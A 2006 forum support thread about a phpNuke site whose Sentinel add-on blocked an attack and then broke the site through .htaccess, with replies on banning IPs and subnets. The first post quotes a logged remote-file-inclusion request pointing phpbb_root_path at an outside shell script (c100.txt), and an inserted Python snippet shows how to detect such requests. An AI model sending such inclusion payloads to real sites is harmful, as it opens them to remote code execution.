Author |
Message |
Gazanimal
Hangin' Around

Joined: Nov 29, 2005
Posts: 47
|
Posted:
Fri Sep 29, 2006 8:42 am |
|
Hi guys.
I got an email notifying me that someone had made an attack on my website, specifically my forums & that Sentinel had repelled them. Good job
However, after the attempted intrusion my website suffered a "500 - Internal Server Error" every time someone tried to connect.
The email did shed some light onto the problem (which I've posted below) but I can access the website fine if I delete the .htaccess.
Quote: | Date & Time: 2006-09-29 03:47:25 BST GMT +0100
Blocked IP: 72.20.3.*
User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Query String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Get String: noegoclan.co.uk/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://www.bob.7tfi.com/c100.txt
Post String: noegoclan.co.uk/web/modules.php
Forwarded For: none
Client IP: none
Remote Address: 72.20.3.58
Remote Port: 3277
Request Method: GET
--------------------
Who-Is for IP
72.20.3.58 |
As you can see they tried to use some kind of trojan script in a text file.
*WARNING* I'd not advise anyone to visit the url included in the email as my anti-virus picked it up & blocked it so be aware.
Also, the only thing in my .htaccess file is the IP of the attacker, nothing else.
In Sentinel I have it set to "Admin - HTTPAuth".
If I delete the .htaccess from my website it works perfectly, but before the attack it worked great & I had not had any problem. Is there something else wrong that is causing the error?
Thanks for any help as I'm not a website guru & value the help.  |
|
|
|
 |
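The blocked request in the report above chains a second `?` inside the query string, so `phpbb_root_path` ends up hidden inside the `name` value when the query is parsed the usual way. As an added example (not part of the thread and not Sentinel's own filter), this Python check flags parameters whose value is a remote URL in logged request URIs; the function names and the sample requests are constructed for illustration.

```python
import re
from urllib.parse import unquote

# A parameter value that begins with a remote scheme. Legitimate redirect or
# link parameters match too, so treat hits as candidates for review.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftp)://", re.IGNORECASE)


def decode(text, rounds=3):
    """Percent-decode up to `rounds` times to see through double encoding."""
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def remote_include_params(request_uri):
    """Return [(param, value)] for parameters whose value is a remote URL."""
    _, _, query = request_uri.partition("?")
    hits = []
    # Split on '?' as well as '&' and ';': the logged request chains a second
    # '?' inside the query, which a standard parser folds into the first value.
    for chunk in re.split(r"[?&;]", decode(query)):
        name, sep, value = chunk.partition("=")
        if sep and REMOTE_VALUE.match(value):
            hits.append((name, value))
    return hits


# Constructed sample requests; the first has the shape of the logged one.
SAMPLES = [
    "/web/modules.php?name=Forums_ug_auth.php?phpbb_root_path=http://remote.invalid/c100.txt",
    "/web/modules.php?name=Forums&file=viewtopic&t=12",
    "/web/modules.php?name=Forums&phpbb_root_path=http%253A%252F%252Fremote.invalid%252Fc100.txt",
]

if __name__ == "__main__":
    for uri in SAMPLES:
        print(uri, "->", remote_include_params(uri) or "clean")
```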
hitwalker
Sells PC To Pay For Divorce

Joined:
Posts: 5661
|
Posted:
Fri Sep 29, 2006 8:54 am |
|
kick out the ip..
72.20.3
that doesn't exist and is incomplete. |
|
|
|
 |
Gazanimal

|
Posted:
Fri Sep 29, 2006 9:27 am |
|
The IP blocking config in Sentinel is set to:
Quote: | 1 Octet (127.3.4.*) |
Should I change it to full IP or add in the full IP of the hacker instead as I do have that?
I have Sentinel also set to write to .htaccess when someone is blocked but should I set it not to write to .htaccess? Will the IP still be blocked if not?? |
|
|
|
 |
srhh
Involved


Joined: Dec 27, 2005
Posts: 296
|
Posted:
Fri Sep 29, 2006 9:33 am |
|
Hmm, I could be mistaken, but I think it's safer to leave the sub-net included in bans.
The banned IP will still be in the database too after you delete it from the htaccess file. |
|
|
|
 |
Gazanimal

|
Posted:
Fri Sep 29, 2006 9:41 am |
|
I'm starting to think that my webhost doesn't like the use of .htaccess if I remember correctly.
I might need to alter my Sentinel settings to not write to .htaccess when an attack is logged & leave it included in the database.
So should I use Full IP or only partial? |
|
|
|
 |
evaders99
Former Moderator in Good Standing

Joined: Apr 30, 2004
Posts: 3221
|
Posted:
Fri Sep 29, 2006 11:35 am |
|
That subnet seems to be owned by Staminus Communications, a US company.
My guess is that it is just one hacked server. So you probably can just ban the specific IP - 72.20.3.58
If it were known hacker groups, say in Turkey or Russia, I would have recommended banning the entire ISP subnet. |
|
|
 |
Gazanimal

|
Posted:
Fri Sep 29, 2006 1:28 pm |
|
Cheers guys, I'll ban the specific user.
Is it easy to ban specific ranges of IPs for countries? Bearing in mind that I can't use .htaccess |
|
|
|
 |
hitwalker

|
Posted:
Fri Sep 29, 2006 1:35 pm |
|
Cannot use htaccess?
If that's so I suggest you get another host.. |
|
|
|
 |
evaders99

|
Posted:
Sun Oct 01, 2006 9:26 pm |
|
Yes it is easy to ban the entire country using Sentinel.
I don't know if .htaccess is being written to as well, but it is quite useful to ban on the server level. That would stop them from accessing anything on your site. Sentinel bans w/o .htaccess would only protect scripts running through phpNuke |
|
|
|
 |
|